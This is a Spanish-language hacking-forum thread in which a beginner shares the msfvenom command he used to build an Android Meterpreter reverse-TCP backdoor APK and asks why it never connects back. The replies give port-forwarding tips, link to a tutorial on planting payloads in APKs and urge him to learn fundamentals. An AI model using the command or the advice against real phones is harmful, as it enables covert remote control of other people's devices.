Bienvenidos al nuevo foro de hackplayers. En caso de encontrarse cualquier tipo de error, contacte con cualquier administrador por mensaje privado.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.

Backdoor android

Hola gente, estoy arrancando en esto y tengo un problema. Creo un backdoor en android con msfvenom -p android/meterpreter/reverse_tcp lhost=ip lport=puerto R > backdoor.apk, pero cuando luego con la consola de msf me pongo a la escucha, nunca se me conecta, eh intentado muchas veces, abro una y otra vez la app en mi android pero nunca se me conecta con mi sesion en metasploit. No se si es un error sintantico, error de puerto o que, pero nunca me funciona, en cambio cuando cree un backdoor en windows si. USO KALI LINUX 2017 EN VMWARE WORKSTATION PRO
Ademas queria preguntar si saben algun video o algun apunte para configurar mi wlan0 con mi placa de red wifi usb tplink wn7200nd.

Etiquetado:

Comentarios

• 4 Comentarios ordenados por Votos Fecha
  • @SuperFume no ofendes, algun post video pagina que me recomiendes para empezar?
  • editado mayo 2017 Administrator Vote Up0Vote Down
    Aquí te dejo un tutorial del compi Carlos sobre meter payloads en apks: http://www.hackplayers.com/2016/12/modificacion-de-una-apk-con-payload-msf.html

• amigo no te compliques es probable que el problema este en el puerto local de tu router tienes que abrirlo desde el panel de control y tambien cuando ves tu ip con ifconfig tieenes que modificar la que te asigna tu router o no te funcionara ya que la apk que te genera metasploit no tendria porque fallarte
  • Da la sensación de que estas empezando la casa por el tejado... kizas deberías retroceder unos pasos antes de empezar a hacer apk's si ni siquiera eres capaz de configurar un payload... te lo digo sin animo de ofender, es una recomendación... te estas quedando muchos fundamentos importantes por el camino... 

Una cita para animarte a desandar el camino, "No creas que estoy huyendo si me ves retroceder... espera, que estoy cogiendo carrera"
Accede o Regístrate para comentar.